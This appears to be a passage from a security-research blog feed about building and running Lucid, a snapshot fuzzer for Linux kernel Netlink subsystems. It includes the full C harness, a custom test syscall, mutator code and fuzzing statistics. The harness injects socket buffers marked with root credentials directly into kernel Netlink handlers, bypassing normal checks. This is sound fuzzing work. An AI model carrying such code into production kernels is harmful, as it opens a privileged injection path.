    "00000000  14 00 00 00 10 00 01 00  00 00 00 00 00 00 00 00 |................|",
    "00000010  00 00 0a 00 28 00 00 00  00 0a 01 00 01 00 00 00 |....(...........|",
    "00000020  00 00 00 00 01 00 00 00  09 00 01 00 66 75 7a 7a |............fuzz|",
    "00000030  00 00 00 00 08 00 02 00  00 00 00 00 14 00 00 00 |................|",
    "00000040  11 00 01 00 02 00 00 00  00 00 00 00 00 00 0a 00 |................|"
]

# Byte string we'll fill
all_bytes = b''
for line in msg_str:
    # Skip the offset stuff
    hex_start = line[10:]

    # Cut off the back ascii stuff
    hex_str = hex_start[:len(hex_start) - 18]

    # Remove the spaces
    hex_str = hex_str.replace(" ", "")

    # Start appending
    all_bytes += bytes.fromhex(hex_str)

# Now with bytes, wrap that in envelope
envelope_len = len(all_bytes)
envelope = struct.pack('<I', envelope_len) + all_bytes

# Now wrap that in an lf_input
num_envs = 1
total_len = 8 # Metadata for lf_input
total_len += len(envelope)
lf_input = struct.pack('<II', total_len, num_envs) + envelope

# Write that to stdout
sys.stdout.buffer.write(lf_input)

We can now pipe that to base64 and then pipe that to the harness for testing:

[devbox:~/nft_fuzzing]$ python3 wrapper.py | base64
XAAAAAEAAABQAAAAFAAAABAAAQAAAAAAAAAAAAAACgAoAAAAAAoBAAEAAAAAAAAAAQAAAAkAAQBmdXp6AAAAAAgAAgAAAAAAFAAAABEAAQACAAAAAAAAAAAACgA=
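As a quick sanity check on that output, the first 16 base64 characters decode to exactly the 12 header bytes (base64 maps every 4 characters to 3 bytes). This sketch assumes the little-endian u32 layout of lf_input followed by the first lf_envelope length:

```python
import base64
import struct

# First 16 characters of the base64 output above
HEADER_B64 = "XAAAAAEAAABQAAAA"

raw = base64.b64decode(HEADER_B64)
total_len, num_envs, env_len = struct.unpack("<III", raw)
print(total_len, num_envs, env_len)  # 92 1 80
```

The numbers line up with the layout: an 8-byte input header, a 4-byte envelope header, and the 80-byte Netlink dump give 92 bytes in total.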

Then when we run echo "<base64 output>" | base64 -d | harness on the qemu-system running our custom kernel, we get the following kernel logs:

[   23.347957] Inside lucid fuzz!
[   23.349015] Calling lucid_fuzz_init...
[   23.350233] Hello from lucid_fuzz_init
[   23.351399] LF_MAX_INPUT_LEN is: 196712
[   23.355266] Hello from lucid_fuzz_handle_input
[   23.359789] Calling lucid_fuzz_cleanup...
lucid_fuzz returned 0

So the harness works!

Conclusion

Hopefully this helps you understand how to write a harness for Lucid. We needed to:

identify a way to inject raw input bytes into kernel memory
take a snapshot with our special NOP instruction
implement a custom protocol that our harness can understand so that it can parse the raw input bytes into something that can be sent to the target
reset the snapshot with our special NOP instruction
clean up all the resources in the harness so we can use it for debugging as well

I’ve pasted the full harness code that I added in af_netlink.c below, cheers:

/*************** Start of Lucid Fuzzing Harness *****************************/
#define LF_MAX_NUM_ENVS 24UL // Number of envelopes in an input
#define LF_MAX_ENV_LEN 8192UL // Number of bytes in an envelope payload 
#define LF_INPUT_HDR_SIZE (sizeof(u32) * 2) // lf_input->total_len, num_envs
#define LF_ENV_HDR_SIZE (sizeof(u32)) // lf_envelope->len
#define LF_MAX_TOTAL_ENV ((LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS)
#define LF_MAX_INPUT_LEN (LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE)

// Used by Lucid when scanning for where to inject the input 
#define LUCID_SIGNATURE { 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, \
                          0x13, 0x38, 0x13, 0x38, 0x13, 0x38, 0x13, 0x38 }

// Structure that describes an input as Lucid sees it
struct lf_fuzzcase {
	unsigned char signature[16];
	size_t input_len;
	u8 input[LF_MAX_INPUT_LEN];
};

// Create instance of the struct
struct lf_fuzzcase fc = {
	.signature = LUCID_SIGNATURE,
	.input_len = 0,
	.input = { 0 }	/* Where Lucid injects an input */
};

// The function pointer we send the skbs to, the netlink rcv handler for
// netfilter nfnetlink_rcv
void *handler = NULL;

// The kernel-registered socket waiting for input from us
struct sock *kern_sock = NULL;

// Pool of skbs we use to store data in envelopes
struct sk_buff *skbs[LF_MAX_NUM_ENVS] = { 0 }; 

// Our initialization function, called before we do any fuzzing
int lucid_fuzz_init(const void __user *data, size_t len) {
	int err = 0;
	int i = 0;
	struct sk_buff *skb = NULL;

	printk("Hello from lucid_fuzz_init\n");
	printk("LF_MAX_INPUT_LEN is: %lu\n", LF_MAX_INPUT_LEN);

	// Copy the user data over to the fuzzcase instance if there is any
	if (len > 0 && len <= LF_MAX_INPUT_LEN) {
		if (copy_from_user(
			fc.input, data, len
		))
		{
			err = -EFAULT;
			goto done;
		}
		fc.input_len = len;
	}

	// Doing this how other kernel code does it, lock the global table
	netlink_table_grab();

	// Pre-set the err as if we failed to find the handler for NETFILTER
	err = -ENOENT;

	// Check to see if the handler is registered
	if (!nl_table[NETLINK_NETFILTER].registered) {
		netlink_table_ungrab();
		goto done;
	}

	// Grab the kernel socket
	kern_sock = netlink_lookup(&init_net, NETLINK_NETFILTER, 0);
	if (!kern_sock) {
		netlink_table_ungrab();
		goto done;
	}

	// Grab that .input handler
	handler = nlk_sk(kern_sock)->netlink_rcv;
	if (!handler) {
		netlink_table_ungrab();
		goto done;
	}

	// Ungrab the table we're done with it
	netlink_table_ungrab();

	// Pre-set
	err = -ENOMEM;

	// Create all of the socket buffers we need and store them
	for (i = 0; i < LF_MAX_NUM_ENVS; i++) {
		skb = alloc_skb(LF_MAX_ENV_LEN, GFP_KERNEL);
		// If we failed, unroll all the previous allocations
		if (!skb) {
			while (--i >= 0) {
				kfree_skb(skbs[i]);
				skbs[i] = NULL;
			}
			goto done;
		}

		// Initialize what we need to look legit
		skb->pkt_type = PACKET_HOST;
		skb->sk = kern_sock;
		NETLINK_CB(skb).portid = 0x1337;
		NETLINK_CB(skb).dst_group = 0;
		NETLINK_CB(skb).creds.uid = GLOBAL_ROOT_UID;
		NETLINK_CB(skb).creds.gid = GLOBAL_ROOT_GID;
		NETLINK_CB(skb).flags = NETLINK_SKB_DST;

		// Store the skb
		skbs[i] = skb;
	}

	// We are so done dude, it worked
	err = 0;

done:
	return err;
}

// Define our input structures
struct lf_input {
	u32 total_len;
	u32 num_envs;
	u8 data[];
};

struct lf_envelope {
	u32 len;
	u8 data[];
};

// Creates a socket buffer filled with fuzz message
static struct sk_buff *create_fuzz_skb(struct lf_envelope *env, int idx) {
	struct sk_buff *skb = NULL;

	// Sanity check
	if (idx >= LF_MAX_NUM_ENVS)
		return NULL;

	// Grab socket buffer from global buf
	skb = skbs[idx];

	// Set the socket buffer's sock to the kernel sock for Netfilter
	skb->sk = kern_sock;

	// Inject fuzz data and set sizes
	memcpy(skb_put(skb, env->len), env->data, env->len);

	return skb;
}

// Dispatches the skb to the appropriate netlink recv handler
static void dispatch_skb(struct sk_buff *skb) {
	// Create a typed function pointer from the handler we saved during init
	void (*rcv)(struct sk_buff *) = handler;

	// Dispatch!
	rcv(skb);
}

// Main input processing logic
int lucid_fuzz_handle_input(void) {
	int i = 0;
	struct lf_input *input = NULL;
	struct lf_envelope *env = NULL;
	struct sk_buff *fuzz_skb = NULL;
	u32 remaining = 0;
	u32 offset = 0;

	printk("Hello from lucid_fuzz_handle_input\n");

	/** LUCID TAKES SNAPSHOT HERE **/
	// This special NOP instruction, when interpreted by Bochs will cause
	// Bochs to save a snapshot of its state to disk that Lucid will be able
	// to resume in its purpose-built version of Bochs called `lucid_bochs`
	asm volatile("xchgw %dx, %dx");

	// Make sure we have enough bytes to construct the input metadata
	if (fc.input_len < sizeof(struct lf_input))
		return 1;

	// Cast the data to our metadata struct
	input = (struct lf_input *)fc.input;

	// Sanity check the values
	if (input->total_len != fc.input_len || input->total_len > LF_MAX_INPUT_LEN)
		return 1;

	// Sanity check the number of messages
	if (input->num_envs > LF_MAX_NUM_ENVS || input->num_envs == 0)
		return 1;

	// Check how many remaining bytes we have, and subtract what we already
	// consumed with the input metadata
	remaining = input->total_len;
	remaining -= LF_INPUT_HDR_SIZE;

	// Start tracking an offset into the byte buffer where we're reading from
	offset = LF_INPUT_HDR_SIZE;

	// Iterate through the envelopes and parse each one
	for (i = 0; i < input->num_envs; i++) {
		// Make sure we have enough data remaining to parse an envelope metadata
		if (remaining < LF_ENV_HDR_SIZE)
			return 1;

		// We can at least read the length field, and sanity check it
		env = (struct lf_envelope *)(fc.input + offset);
		if (env->len > LF_MAX_ENV_LEN || env->len == 0)
			return 1;

		// Consume those bytes
		remaining -= LF_ENV_HDR_SIZE;

		// Make sure we can read that much data
		if (remaining < env->len)
			return 1;

		// We have enough data left, create the skb for this envelope
		fuzz_skb = create_fuzz_skb(env, i);
		if (!fuzz_skb)
			return 1;

		// Dispatch the fuzz_skb to nftables!
		dispatch_skb(fuzz_skb);

		// Update our offset
		offset += (LF_ENV_HDR_SIZE + env->len);

		// Update remaining
		remaining -= env->len;
	}

	// Done parsing envelopes, check if we have remaining bytes
	if (remaining)
		return 1;

	/** LUCID RESTORES SNAPSHOT **/
	asm volatile("xchgw %bx, %bx");

	// Finally done
	return 0;
}

// Clean up resources from lucid_fuzz_init(), not used when fuzzing but good
// for harness dev/testing
void lucid_fuzz_cleanup(void) {
	int i = 0;

	for (i = 0; i < LF_MAX_NUM_ENVS; i++) {
		kfree_skb(skbs[i]);
		skbs[i] = NULL;
	}

	// NULL the globals
	kern_sock = NULL;
	handler = NULL;

	// Set input size to 0
	fc.input_len = 0;
}
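
For testing a mutator or generator off-target, it can help to have a userspace model of the same strict parsing rules. The following is a rough sketch, not part of the harness: it mirrors the checks in lucid_fuzz_handle_input under the assumption of little-endian u32 fields, and the function name split_envelopes is hypothetical. Unlike the kernel code, it only collects the envelope payloads instead of dispatching them.

```python
import struct

# Limits copied from the harness macros.
LF_MAX_NUM_ENVS = 24
LF_MAX_ENV_LEN = 8192
LF_INPUT_HDR_SIZE = 8   # lf_input.total_len + lf_input.num_envs
LF_ENV_HDR_SIZE = 4     # lf_envelope.len
LF_MAX_INPUT_LEN = (
    (LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS + LF_INPUT_HDR_SIZE
)

def split_envelopes(buf: bytes):
    """Return the envelope payloads, or None where the harness would bail out."""
    if len(buf) < LF_INPUT_HDR_SIZE:
        return None
    total_len, num_envs = struct.unpack_from("<II", buf, 0)
    if total_len != len(buf) or total_len > LF_MAX_INPUT_LEN:
        return None
    if num_envs == 0 or num_envs > LF_MAX_NUM_ENVS:
        return None

    remaining = total_len - LF_INPUT_HDR_SIZE
    offset = LF_INPUT_HDR_SIZE
    payloads = []
    for _ in range(num_envs):
        # Need at least an envelope header
        if remaining < LF_ENV_HDR_SIZE:
            return None
        (env_len,) = struct.unpack_from("<I", buf, offset)
        if env_len == 0 or env_len > LF_MAX_ENV_LEN:
            return None
        remaining -= LF_ENV_HDR_SIZE
        # Need the full payload the header promises
        if remaining < env_len:
            return None
        start = offset + LF_ENV_HDR_SIZE
        payloads.append(buf[start:start + env_len])
        offset = start + env_len
        remaining -= env_len

    # Leftover bytes are treated as an error, just like in the harness
    return payloads if remaining == 0 else None
```

Any input for which this returns None would return early in the kernel harness and never reach the snapshot-restore NOP, so a check like this is a cheap way to catch generator bugs before they show up as timeouts.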

Lucid Dreams I: Lucid’s First Time Fuzzing

2025-10-04T00:00:00+00:00

Background

We’ve spent a lot of time so far on this blog documenting the development process of Lucid, our full-system snapshot fuzzer, and I really wanted to start using it to do some real fuzzing. So the focus of this blog post will be documenting the process I had to take to get Lucid up and fuzzing on a real target. So far, Lucid has only worked on a toy harness/example, and so we need to see what kind of things need tweaking when a real target comes into play.

Off-Blog Snapshot Dev

Since the last post, the biggest change has been the way we do snapshots. I found that on the simple development target, a really tight fuzzing loop, the scaling factor for the old snapshot method deteriorated quickly.

Old Snapshot Method Revisited

If you remember, the fuzzer works by loading a static-pie ELF image of the Bochs x86 emulator into the fuzzer process and context switching between the now sandboxed emulator that runs our target and our fuzzer, which does all the fuzzy things. Because we load and sandbox Bochs, we know the location of every writable memory segment in the image, as well as where the dynamic memory is, because we don’t allow Bochs to interface with the OS to allocate memory; the fuzzer handles that. So what we did was map the writable memory segments such that they were all contiguous in memory. Then when we take a snapshot of Bochs, all we have to do is capture that memory state and save it off. We did that, and we saved the memory as a memory-backed file. On Linux, snapshot restoration then becomes very simple: we just mmap that memory-backed file back over the top of the contiguous writable memory region. One single syscall to restore memory. We did this mainly because it was very simple.

Well, it turns out that when you ask the kernel to invalidate, destroy, and overwrite billions of bytes worth of pages thousands of times per second, it scales poorly. I’m embarrassed to admit that I don’t quite remember what the bottleneck was, but I seem to remember that the mmap requests needed some sort of serialization and were spending most of their CPU time destroying the dirtied memory backing pages. My scaling factor went into the toilet once I brought up the 8 cores I have on my devbox. So I had to find another way to do this, likely one that didn’t depend on restoring all writable memory each iteration, but instead differentially reset only the dirty memory in Bochs.

New Strategy for Linear Scaling

We want to be able to scale Lucid linearly as we bring more cores online for fuzzing, so we want our scaling factor to be one-to-one with the number of cores being used. 100 cores should bring us a 100x speed-up over single-core fuzzing. So we need a way to differentially restore only the dirty memory and not all writable memory. We also want to strive for a method that doesn’t invoke the kernel via syscall, because that’s how you bottleneck across cores. The way I decided to do this is not novel and I didn’t invent it; it’s actually similar to the way a lot of fuzzers get coverage feedback on black-box targets.

What I ended up doing is marking all of the writable pages that we load for Bochs as having no write permissions (strictly PROT_READ). This way, when Bochs tries to write to a page, it will cause a page-fault. On Linux, your process gets a signal delivered whenever this happens and you can invoke a function to handle signals. So I patched Bochs to handle these page faults and in the signal handler function Bochs marks the faulting address as a dirty page in a data structure that both Bochs and Lucid have access to. So now, we’ve logged a page that was dirtied and we then make that page permanently writable and we restore that page on snapshot reset every time now. This design boils snapshot restoration down to a series of memcpy calls from the snapshot memory to the dirty memory. Now we’ve achieved differential restoration and everything is done purely in userspace via memcpy, no syscalls are invoked in the hot path to restore the snapshot. This seems to scale perfectly and we’re pretty close to the one-to-one scaling factor we’re after. The fuzzers spend 100% of their time in userland when they’re executing the hot fuzzing loops.

+----------------------------------------------+
| [1] Fuzzcase Begins                          |<---------------+
| Lucid starts executing target code in Bochs. |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [2] Bochs Writes to Page                     |                |
| Attempted write -> page is PROT_READ only.   |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [3] Page Fault Handler                       |                |
| Fault occurs -> handler adds page to dirty   |                |
| list and sets protection to PROT_WRITE.      |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [4] Fuzzcase Ends                            |                |
| Execution completes                          |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [5] Snapshot Restore                         |                |
| Lucid iterates dirty list -> memcpy snapshot |                |
| contents back into those pages.              |----------------+
| (No syscalls, all user-space.)               |
+----------------------------------------------+
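
The loop in the diagram can be modeled in a few lines. This is only a toy simulation to show the bookkeeping, not Lucid's implementation: there is no real mprotect or signal handling here, the write method stands in for the page-fault handler, and the class and method names are invented for illustration.

```python
PAGE_SIZE = 4096

class TrackedMemory:
    """Toy model of differential snapshot restore (no real mprotect/signals)."""

    def __init__(self, size: int):
        self.mem = bytearray(size)
        self.snapshot = bytes(size)
        self.dirty = []        # pages dirtied since the snapshot, in first-write order
        self.writable = set()  # pages that have already been "unprotected"

    def take_snapshot(self) -> None:
        self.snapshot = bytes(self.mem)
        self.dirty.clear()
        self.writable.clear()

    def write(self, addr: int, data: bytes) -> None:
        first = addr // PAGE_SIZE
        last = (addr + len(data) - 1) // PAGE_SIZE
        for page in range(first, last + 1):
            if page not in self.writable:
                # Stand-in for the fault handler: log the page once and
                # leave it writable from now on.
                self.writable.add(page)
                self.dirty.append(page)
        self.mem[addr:addr + len(data)] = data

    def restore(self) -> int:
        """Copy snapshot contents over every logged page; return pages copied."""
        for page in self.dirty:
            start = page * PAGE_SIZE
            self.mem[start:start + PAGE_SIZE] = self.snapshot[start:start + PAGE_SIZE]
        return len(self.dirty)
```

Note that restore does not clear the dirty list. That matches the description above: once a page has faulted it stays writable and is restored on every reset, so the fault cost is paid once per page rather than once per iteration.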

Redqueen for Compare Solving

I was also able to implement Redqueen by instrumenting compare instructions in Bochs. We’ll get into Redqueen in more detail below when we enable compare coverage in our fuzzing experiment and try to determine how helpful it is for this specific target.

Harness Development

With that out of the way, we need something to fuzz! For this, I wanted to do something very broad and shallow, so I homed in on Linux kernel subsystems that are accessible via Netlink. Netlink is a network/communication protocol that allows userspace to communicate with the kernel over sockets, vs. something like a driver or a syscall. A lot of the bugs that have been exploited in public over the last 5 years have been in subsystems that have Netlink plumbing, things like netfilter, the packet scheduler, etc. Because these subsystems are designed to just receive bytes of Netlink buffer data, I thought this would be a great first thing to get fuzzing on.

Since we want to fuzz multiple subsystems (broad, shallow), we first have to figure out how Netlink communications normally function. The typical workflow of a userspace program or utility that wants to communicate with the kernel over Netlink is to open a Netlink socket of a specific type of Netlink protocol, something like the following that are used in the harness: NETLINK_ROUTE, NETLINK_XFRM, NETLINK_NETFILTER, and NETLINK_CRYPTO. For example:

socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER)

When the userspace program sends data to the Netlink socket that has a protocol associated with it, we end up in netlink_sendmsg. This function’s job is basically to create an appropriately initialized struct sk_buff that wraps the user’s data that was sent via the sendmsg syscall. This socket buffer is then dispatched to the appropriate handler (in the example, the handler for NETFILTER would be nfnetlink_rcv).

So what I want to do is skip any userspace to kernel context switching in our harness and just inject our fuzzing inputs directly into kernel space to be dispatched to the appropriate handlers. So I ended up structuring the fuzzing input as a series of what I’m calling “messages” and each “message” is its own Netlink message for a random protocol that we’re fuzzing. I settled arbitrarily on fuzzing inputs maxing out at 16 messages, so we can randomly send any number of messages per input up to 16. In the fuzzing harness, we use these data structures to create a fuzzing input:

// An input structure
struct lf_input {
	u32 total_len;
	u32 num_msgs;
	u8 data[];
};

// A message structure
struct lf_msg {
	u32 protocol;
	u32 msg_len;
	u8 data[];
};

So the entire input structure is described by struct lf_input which tells us the total length of the messages it contains and the number of messages followed by all of the messages stuffed together. An individual message is described by struct lf_msg which contains a protocol member corresponding to one of the NETLINK protocols we listed earlier (NETLINK_ROUTE, NETLINK_XFRM, NETLINK_NETFILTER, and NETLINK_CRYPTO) and then the message’s length msg_len and the message’s data thereafter:

============================= LUCID INPUT STRUCTURE =============================
lf_input {
  total_len: 4 bytes
  num_msgs:  4 bytes
  ────────────────────
  lf_msg {
    protocol: 4 bytes  (ROUTE=0, XFRM=1, NETFILTER=2, CRYPTO=3)
    msg_len:  4 bytes
    data:     variable (netlink message bytes)
  },
  lf_msg {
    protocol: 4 bytes  (ROUTE=0, XFRM=1, NETFILTER=2, CRYPTO=3)
    msg_len:  4 bytes
    data:     variable (netlink message bytes)
  },
  ... (up to 16 messages)
}
=================================================================================
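
To make the layout concrete, here is a small sketch of how such an input could be serialized from userspace. It assumes little-endian u32 fields and uses the protocol indices from the diagram; the function name pack_input is hypothetical. It also assumes total_len covers the whole blob including the 8-byte header, since the harness compares it against the full input length.

```python
import struct

# Protocol indices as labeled in the layout diagram.
ROUTE, XFRM, NETFILTER, CRYPTO = 0, 1, 2, 3
LF_MAX_MSGS = 16
LF_INPUT_HDR_SIZE = 8  # total_len + num_msgs

def pack_input(msgs):
    """Serialize [(protocol, payload_bytes), ...] into an lf_input blob."""
    if len(msgs) > LF_MAX_MSGS:
        raise ValueError("too many messages for one input")
    # Each lf_msg is an 8-byte header (protocol, msg_len) followed by its data
    body = b"".join(
        struct.pack("<II", proto, len(data)) + data for proto, data in msgs
    )
    total_len = LF_INPUT_HDR_SIZE + len(body)
    return struct.pack("<II", total_len, len(msgs)) + body

blob = pack_input([(NETFILTER, b"\x01\x02\x03"), (ROUTE, b"")])
print(len(blob), blob.hex())
```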

For testing and development purposes, I leveraged the flexibility/power of snapshot fuzzing to just add a new syscall to the Linux kernel that looked like:

SYSCALL_DEFINE2(lucid_fuzz, const void __user *, data, size_t, len)
{
	int ret = 0;

	printk("Inside lucid fuzz!\n");

	// Initialize everything we need to fuzz
	ret = lf_init(data, len);
	if (ret)
		goto done;

	printk("Initialization done\n");

	// Handle fuzz inputs
	if (lf_handle_input()) {
		ret = -EINVAL;
		goto done;
	}

	// Cleanup resources, not needed when fuzzing, but good for testing
	lf_cleanup();

done:
	printk("Inside done, returning %d!\n", ret);
	return ret;
}

So this will take a user supplied data buffer and send it to lf_init, which is a function I wrote that pre-allocates the socket buffers we want to use (remember we know that at most we can send 16 messages) and finds all of the Netlink subsystem receive handlers, functions like: nfnetlink_rcv, rtnetlink_rcv, crypto_netlink_rcv, and xfrm_netlink_rcv. When not fuzzing under Lucid, the syscall will copy the user supplied data into the global “fuzzcase” variable and then lf_handle_input will take care of wrapping that fuzzcase into the appropriate pre-allocated socket buffer and sending it to the appropriate handler. Here is what lf_handle_input looks like, this is where the magic happens. Keep in mind that the fc variable is a global, standing for “fuzzcase” and this is where Lucid injects fuzzing inputs:

// Main fuzzcase handling logic
int lf_handle_input(void) {
	int i = 0;
	struct lf_input *curr = NULL;
	struct lf_msg *msg = NULL;
	u32 remaining = 0;
	u32 offset = 0;
	struct sk_buff *fuzz_skb = NULL;

	printk("Inside lf_handle_input\n");

	/** LUCID TAKES SNAPSHOT HERE **/
	asm volatile("xchgw %dx, %dx");

	// Make sure we have enough size to make an `lf_input` struct
	if (fc.input_len < sizeof(struct lf_input))
		return 1;

	// Get the `lf_input` and do sanity checks
	curr = (struct lf_input *)fc.input;
	if (curr->total_len != fc.input_len || curr->total_len > LF_MAX_INPUT_SIZE)
		return 1;

	if (curr->num_msgs > LF_MAX_MSGS)
		return 1;

	// Remaining bytes to consume
	remaining = curr->total_len;

	// Since we created a structure, we have consumed the `lf_input` header, we
	// can count those bytes as consumed and update remaining
	remaining -= LF_INPUT_HDR_SIZE;

	// Update offset to point to the first message
	offset = LF_INPUT_HDR_SIZE;

	// Parse and handle the messages in the input
	for (i = 0; i < curr->num_msgs; i++) {
		// Make sure we have enough size to make an `lf_msg` struct
		if (remaining < LF_MSG_HDR_SIZE)
			return 1;

		// Create an `lf_msg` struct
		msg = (struct lf_msg *)(fc.input + offset);
		if (msg->msg_len > LF_MAX_MSG_SIZE || msg->protocol >= LF_NUM_PROTOCOLS)
			return 1;

		// We've now consumed the message header bytes
		remaining -= LF_MSG_HDR_SIZE;

		// Make sure we have enough data remaining to fill this message
		if (remaining < msg->msg_len)
			return 1;

		// Create a fuzzcase skb to send to netlink_rcv function
		fuzz_skb = create_fuzz_skb(msg, i);
		if (!fuzz_skb)
			return 1;
		
		// Dispatch the skb to the appropriate handler
		dispatch_skb(msg, fuzz_skb);

		// Update offset
		offset += (LF_MSG_HDR_SIZE + msg->msg_len);

		// Update remaining
		remaining -= msg->msg_len;
	}

	// Check to see if we have remaining, if we do, something is amiss
	if (remaining)
		return 1;

	/** LUCID RESTORES SNAPSHOT HERE **/
	asm volatile("xchgw %bx, %bx");

	// Success
	return 0;
}

We iterate through the array of messages, parse them, and send them on their way to the appropriate subsystem. I also made this harness extremely strict so that we fail if anything is amiss, even if we have leftover bytes after parsing. This will cause lf_handle_input to return early and not reach the snapshot restoration NOP instruction. This would cause the fuzzcase to “escape” the fuzzing harness and would eventually incur a timeout. In Lucid, we do timeouts based on the number of emulated instructions. So it would be immediately obvious if we had some mutator/generator/harness bug because the fuzzcases would time out.

During this portion of development, I was really focused on optimizing the harness. I wanted to skip all of the Netlink sanity checking and plumbing that takes place after the initial netlink_sendmsg function thinking this would speed up the fuzzer a substantial amount. I was really careful to retain semantic equivalence to that skipped code though. However, in the end, I made mistakes that you may be able to spot. For instance, during a normal netlink_sendmsg call, the socket buffer that it creates doesn’t have all of the same fields initialized and it doesn’t use kernel sockets. So I actually had a single false positive NULL pointer dereference crash at one point during my longest fuzzing session that wouldn’t have existed if I had retained 100% semantic equivalence. I think going forward on the blog, I’ll move more towards less invasive harnessing and just eat the performance hit. It became apparent when our fuzzcases started reaching deeper code paths that the fuzzer was extremely slow and the aggressive optimization in the harness wouldn’t have really made much of a difference, so I’m going to skip that going forward.

It should be noted that this is not a great approach for finding bugs. We’re merely trying to assess how Lucid does fuzzing some real code. Sending random messages per input to the various subsystems that have little interplay with one another and can’t access each other in any meaningful way is not a strategy for reaching deep code and finding complex bugs. Fuzzing in this way is more likely to reveal simple shallow parsing level bugs, and in 2025 that is probably not going to yield many results.

Stage-1 Fuzzing: Dumb Byte Mutator

First things first, let’s throw some random bytes at these Netlink handlers. To do this, I changed how Lucid sees mutator code. Now, there is a top-level Mutators crate and it defines several generic traits and characteristics that every custom mutator implementation must have. These are things like a rand function for example. But after you implement the generic stuff that the core fuzzer relies on, you are free to make your mutator as custom as you like and put it under mutators/ in the source code directory. This allows some pretty nice flexibility. I added a command line flag to specify a mutator by name, and the mutators are then created by the factory-type function here in mod.rs:

/// Simple factory to create mutators by name (extend as needed).
pub fn create_mutator(
    name: &str,
    seed: Option<usize>,
    max_size: usize,
) -> Result<Box<dyn Mutator>, LucidErr> {
    match name {
        "toy" => Ok(Box::new(ToyMutator::new(seed, max_size))),
        "netlink" => Ok(Box::new(NetlinkMutator::new(seed, max_size))),
        _ => Err(LucidErr::from(&format!("Unrecognized mutator '{}'", name))),
    }
}

I started off by just implementing some basic mutation strategies:

ByteInsert: Randomly insert bytes of arbitrary value into the message buffer
ByteOverwrite: Randomly overwrite a byte in the message with a byte of arbitrary value
ByteDelete: Randomly delete a byte from the message buffer
BitFlip: Randomly flip a bit in the message buffer
ProtocolChange: Randomly change the protocol of a message (ie, switch from NETLINK_ROUTE to NETLINK_NETFILTER)

In addition to these strategies, the mutator will often “stack” these strategies per input. I defined a MAX_STACK of 7 (arbitrary), and so the mutator may choose to randomly mutate the input with up to 7 of these strategies per iteration.
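
The real mutator lives in Lucid's Rust code, but the stacking idea is easy to sketch. The following is an illustrative Python approximation only: it covers the four byte-level strategies (ProtocolChange is left out because it operates on the lf_msg header rather than the message bytes), and all function names here are made up.

```python
import random

MAX_STACK = 7  # same arbitrary cap as described above

def byte_insert(buf: bytearray, rng: random.Random) -> None:
    buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))

def byte_overwrite(buf: bytearray, rng: random.Random) -> None:
    if buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)

def byte_delete(buf: bytearray, rng: random.Random) -> None:
    if buf:
        del buf[rng.randrange(len(buf))]

def bit_flip(buf: bytearray, rng: random.Random) -> None:
    if buf:
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)

STRATEGIES = [byte_insert, byte_overwrite, byte_delete, bit_flip]

def mutate(data: bytes, rng: random.Random) -> bytes:
    """Apply between 1 and MAX_STACK randomly chosen strategies to one message."""
    buf = bytearray(data)
    for _ in range(rng.randint(1, MAX_STACK)):
        rng.choice(STRATEGIES)(buf, rng)
    return bytes(buf)

print(mutate(b"\x00" * 16, random.Random(1234)).hex())
```

Seeding the random.Random instance makes a mutation sequence reproducible, which is handy when trying to understand how a particular corpus entry came to be.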

These mutation strategies actually achieved quite a bit of code coverage surprisingly. Initially, the iterations were extremely short because most Netlink messages we sent were nonsensical. The Netlink message structure looks like this:

/**
 * struct nlmsghdr - fixed format metadata header of Netlink messages
 * @nlmsg_len:   Length of message including header
 * @nlmsg_type:  Message content type
 * @nlmsg_flags: Additional flags
 * @nlmsg_seq:   Sequence number
 * @nlmsg_pid:   Sending process port ID
 */
struct nlmsghdr {
	__u32		nlmsg_len;
	__u16		nlmsg_type;
	__u16		nlmsg_flags;
	__u32		nlmsg_seq;
	__u32		nlmsg_pid;
};

Since we’re sending random bytes, we rarely have an nlmsg_len that makes sense for our random message array of bytes. So it took a while for the fuzzer to generate the right type of input to solve early message parsing and actually reach code behind that sanity check. We had to generate an input that had the right length.
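
To get a feel for why random bytes rarely survive, here is a hedged sketch of the kind of length check involved. It is not the kernel's code: it assumes a little-endian host, treats the 16-byte struct nlmsghdr shown above as the minimum, and simply requires nlmsg_len to fall between the header size and the buffer size. The helper names are invented.

```python
import struct

NLMSG_HDRLEN = 16  # sizeof(struct nlmsghdr): u32 + u16 + u16 + u32 + u32

def parse_nlmsghdr(buf: bytes) -> dict:
    """Unpack the fixed header fields (little-endian, as on x86-64)."""
    length, mtype, flags, seq, pid = struct.unpack_from("<IHHII", buf, 0)
    return {"len": length, "type": mtype, "flags": flags, "seq": seq, "pid": pid}

def length_is_plausible(buf: bytes) -> bool:
    """True if nlmsg_len covers at least a header and fits inside the buffer."""
    if len(buf) < NLMSG_HDRLEN:
        return False
    nlmsg_len = parse_nlmsghdr(buf)["len"]
    return NLMSG_HDRLEN <= nlmsg_len <= len(buf)

good = struct.pack("<IHHII", 20, 16, 1, 0, 0) + b"\x00" * 4
junk = b"\xff" * 20
print(length_is_plausible(good), length_is_plausible(junk))
```

With a uniformly random 32-bit nlmsg_len, only a tiny fraction of values land in the acceptable window for a small buffer, which is consistent with the fuzzer needing a while to get past this point.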

Here are the results I achieved with this simple mutator and our aforementioned harness in a short time:

[lucid stats (start time: 2025-09-19 08:57:11)]
globals: uptime: 0d 22h 26m 28s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 88.266M | iters/s: 206.81 | iters/s/f: 25.85
cpu: target: 92.7% | reset: 6.8% | mutator: 0.0% | coverage: 0.5% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 16917 | last find: 0h 2m 6s | map: 25.81%
snapshot: dirty pages: 3841 | dirty / total: 0.00068% | reset memcpys: 438
corpus: inputs: 31000 | corpus size (MB): 318.303 | max input: 0x8088

